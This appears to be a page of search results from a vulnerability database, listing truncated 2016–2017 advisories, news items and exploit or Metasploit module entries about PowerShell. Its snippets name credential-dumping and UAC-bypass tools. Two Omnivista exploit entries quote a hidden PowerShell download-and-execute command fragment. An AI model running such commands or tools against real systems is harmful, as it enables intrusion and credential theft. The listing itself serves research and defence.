
1579 matches found

CVE
added 2017/03/17 12:0 a.m. | 101 views

CVE-2017-0007

CVE-2017-0007 is a Device Guard security feature bypass in Windows 10 (Gold/1511/1607) and Windows Server 2016 where sign-checked PowerShell scripts could be modified without breaking the signature, allowing execution of unsigned/malicious code. Root cause: Device Guard’s validation of certain el...

CVSS 5.5 | AI score 5.5 | EPSS 0.0121
Exploits: 1 | References: 4 | Affected Software: 2

Tenable Nessus
added 2017/03/15 12:0 a.m. | 564 views

MS17-012: Security Update for Microsoft Windows (4013078)

The remote Windows host is missing a security update. It is, therefore, affected by multiple vulnerabilities: - A security feature bypass vulnerability exists in Device Guard due to improper validation of certain elements in a signed PowerShell script. An unauthenticated, remote attacker can...

CVSS 9.3 | AI score 7.7 | EPSS 0.50348
Exploits: 5 | References: 7

FireEye
added 2017/03/09 8:0 a.m. | 12 views

Using the Registry to Discover Unix Systems and Jump Boxes

On red team engagements, Mandiant consultants are often tasked with identifying and obtaining access to critical Unix systems within our client’s environments. The objectives may include obtaining payment card data on point of sale terminals or accessing intellectual property residing on Apple...

AI score 6.7
Exploits: 0

The Hacker News
added 2017/03/05 11:3 p.m. | 14 views

New Fileless Malware Uses DNS Queries To Receive PowerShell Commands

It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system...

AI score 7
Exploits: 0

ThreatPost
added 2017/02/24 5:6 p.m. | 9 views

Researchers Uncover New Leads Behind Shamoon2

In a fresh analysis of the Shamoon2 malware, researchers from Arbor Networks’ Security Engineering and Response Team (ASERT) say they have unearthed new leads on the tools and techniques used in the most recent wave of attacks. Shamoon2 surfaced in November, approximately four years after the...

AI score 0.6
Exploits: 0 | References: 3

Metasploit
added 2017/02/24 9:15 a.m. | 69 views

NTDS Grabber

This module uses a PowerShell script to obtain a copy of the ntds.dit, SAM and SYSTEM files on a domain controller. It compresses all these files in a cabinet file called All.cab. This module requires Metasploit: https://metasploit.com/download Current source:...

AI score 6.8
Exploits: 0

FireEye
added 2017/02/22 9:45 a.m. | 34 views

Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government

Introduction FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool (RAT) that has been used for...

AI score 0.8
Exploits: 0

Kitploit
added 2017/02/04 2:30 p.m. | 119 views

Tater - A PowerShell implementation of the Hot Potato Windows Privilege Escalation Exploit

Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Included In p0wnedShell - https://github.com/Cn33liz/p0wnedShell PowerShell Empire - https://github.com/PowerShellEmpire/Empire PSAttack - https://github.com/jaredhaight/psattack Functions Invoke-Tater Th...

AI score 7.4
Exploits: 0 | References: 4

Microsoft Malware Protection
added 2017/02/03 12:5 a.m. | 42 views

Improved scripts in .lnk files now deliver Kovter in addition to Locky

Cybercriminals are using a combination of improved script and well-maintained download sites to attempt installing Locky and Kovter on more computers. A few months ago, we reported an email campaign distributing .lnk files with a malicious script that delivered Locky ransomware. Opening the...

AI score 7.4
Exploits: 0

n0where
added 2017/01/31 5:43 a.m. | 29 views

AD ACL Scanner

AD ACL Scanner AD ACL Scanner is a tool completely written in PowerShell with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory. New Features Faster compare of Access Control Lists using USN from replication metadata. Primary...

AI score 7.1
Exploits: 0

Lenovo
added 2017/01/23 12:0 a.m. | 69 views

Certain BIOS versions may include an AMI Test Key that could compromise Secure Boot protections - lu

Lenovo Security Advisory: LEN-7806 Potential Impact: Secure boot may be compromised by an attacker with local access Severity: High Scope of Impact: Lenovo-specific Summary Description: Secure Boot is a security standard to help make sure that your PC boots using only trusted software. When the P...

CVSS 7.2 | AI score 7 | EPSS 0.0007
Exploits: 0

Packet Storm
added 2017/01/09 12:0 a.m. | 105 views

Enigma Fileless UAC Bypass

a This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ Exploit Title : enigmafilelessuacbypass.rb Module...

AI score 0.2
Exploits: 0

Microsoft KB
added 2017/01/07 12:0 a.m. | 28 views

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager Introduction This article describes the issues that are fixed in Update Rollup 9 for Microsoft System Center 2012 R2 Virtual Machine Manager. There are three updates available for System Center 2012 R2 Virtual Machine Manager: one...

AI score 6
Exploits: 0

n0where
added 2017/01/03 7:3 a.m. | 21 views

Exploit the Credentials Present in Files and Memory: PowerMemory

PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...

AI score 0.5
Exploits: 0 | References: 2

Metasploit
added 2016/12/20 3:38 a.m. | 54 views

Windows 'Run As' Using Powershell

This module will start a process as another user using powershell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 'Run As' Using Powershell', 'Description' = %q This module will start...

AI score 7.3
Exploits: 0

0day.today
added 2016/12/06 12:0 a.m. | 48 views

Microsoft PowerShell - XML External Entity Injection Vulnerability

Exploit for windows platform in category local exploits + Credits: John Page aka hyp3rlinx Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows PowerShell and PowerShell Core is a task automation and configuration management framework from...

AI score 6.8
Exploits: 0

seebug.org
added 2016/12/06 12:0 a.m. | 34 views

Alcatel Lucent Omnivista 8770 Remote Code Execution(CVE-2016-9796)

No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

CVSS 10 | AI score 9.2 | EPSS 0.23667
Exploits: 4

Exploit DB
added 2016/12/06 12:0 a.m. | 74 views

Microsoft PowerShell - XML External Entity Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...

AI score 7.4
Exploits: 0

exploitpack
added 2016/12/06 12:0 a.m. | 36 views

Microsoft PowerShell - XML External Entity Injection

Microsoft PowerShell - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product:...

AI score 7.8
Exploits: 0

Packet Storm
added 2016/12/05 12:0 a.m. | 61 views

Alcatel Lucent Omnivista 8770 Remote Code Execution

import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

AI score 0.5 | EPSS 0.23667
Exploits: 4